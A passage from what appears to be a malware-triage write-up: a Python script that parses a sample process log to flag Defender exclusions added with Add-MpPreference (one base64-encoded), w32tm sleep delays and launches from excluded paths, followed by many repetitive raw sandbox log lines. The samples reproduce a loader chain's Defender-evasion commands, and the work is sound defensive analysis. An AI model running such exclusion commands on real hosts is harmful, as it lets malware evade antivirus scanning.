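# Constructed sample modelled on the report's process chain (paths as above).
SAMPLE_LOG = r"""
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\HyperWebbroker\lGnbJpj21JH90uguTRu2sUXatfulFm1f34jhZ8QO993nz73C1NZz.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\HyperWebbroker\serverBrokerperfMonitor.exe "C:\HyperWebbroker/serverBrokerperfMonitor.exe"
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellExperiences\uAsLgsGzSk.exe'
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2K3wfCcSpW.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\ShellExperiences\uAsLgsGzSk.exe "C:\Windows\ShellExperiences\uAsLgsGzSk.exe"
""" + (
    r"Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: "
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "
    + _encode_command(r"Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'") + "\n")


def parse_events(text):
    """One dict (parent, image, cmdline) per process-creation entry."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            events.append({"parent": m.group(1), "image": m.group(2), "cmdline": m.group(3)})
    return events


def expand_encoded(cmdline):
    """Return (cmdline plus decoded script, True) when -EncodedCommand is present."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline, False
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline, False
    return cmdline + " " + decoded, True


def find_defender_exclusions(events):
    """Exclusions added through (Add|Set)-MpPreference, plain or base64-encoded."""
    found = []
    for ev in events:
        if "powershell" not in ev["image"].lower():
            continue
        text, encoded = expand_encoded(ev["cmdline"])
        for m in EXCL_RE.finditer(text):
            found.append({"parent": ev["parent"], "kind": m.group(1), "encoded": encoded,
                          "value": m.group(2) or m.group(3) or m.group(4)})
    return found


def find_w32tm_sleeps(events):
    """w32tm /stripchart against localhost is a sleep substitute in batch loaders;
    with /samples:N it blocks for roughly period * (N - 1) seconds (approximation)."""
    sleeps = []
    for ev in events:
        cl = (ev["image"] + " " + ev["cmdline"]).lower()
        if not ("w32tm" in cl and "/stripchart" in cl and "/computer:localhost" in cl):
            continue
        period = re.search(r"/period:(\d+)", cl)
        samples = re.search(r"/samples:(\d+)", cl)
        period = int(period.group(1)) if period else 2  # w32tm's default period
        est = period * (int(samples.group(1)) - 1) if samples else None
        sleeps.append({"parent": ev["parent"], "cmdline": ev["cmdline"], "estimated_seconds": est})
    return sleeps


def launches_from_excluded_paths(events, exclusions):
    """Processes started from a path that was excluded from Defender scanning."""
    paths = {e["value"].lower().rstrip("\\") for e in exclusions if e["kind"].lower() == "path"}
    hits = []
    for ev in events:
        image = ev["image"].lower()
        for p in paths:
            if image == p or image.startswith(p + "\\"):
                hits.append({"parent": ev["parent"], "image": ev["image"], "exclusion": p})
    return hits


def triage(text):
    """Run all three checks over a log and return the findings together."""
    events = parse_events(text)
    exclusions = find_defender_exclusions(events)
    return {"events": events, "exclusions": exclusions, "sleeps": find_w32tm_sleeps(events),
            "excluded_launches": launches_from_excluded_paths(events, exclusions)}
```

`triage(SAMPLE_LOG)` reports two exclusions (one decoded from the -EncodedCommand line), one w32tm sleep of about 5 seconds, and one launch of uAsLgsGzSk.exe from a path that had just been excluded; that last correlation is the high-confidence signal, since the exclusion alone could be an administrator. On a live host the same three signals come from process-creation telemetry (Security event 4688 with command-line auditing, or Sysmon event 1) and from the Microsoft-Windows-Windows Defender/Operational log, where event 5007 records each preference change; `Get-MpPreference | Select-Object ExclusionPath` shows the exclusions currently in force.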
Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0091F654 cpuid | 0_2_0091F654
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: GetLocaleInfoW,GetNumberFormatW | 0_2_0091AF0F
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Queries volume information: C:\HyperWebbroker\serverBrokerperfMonitor.exe VolumeInformation
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Recovery\uAsLgsGzSk.exeQueries volume information: C:\Recovery\uAsLgsGzSk.exe VolumeInformation
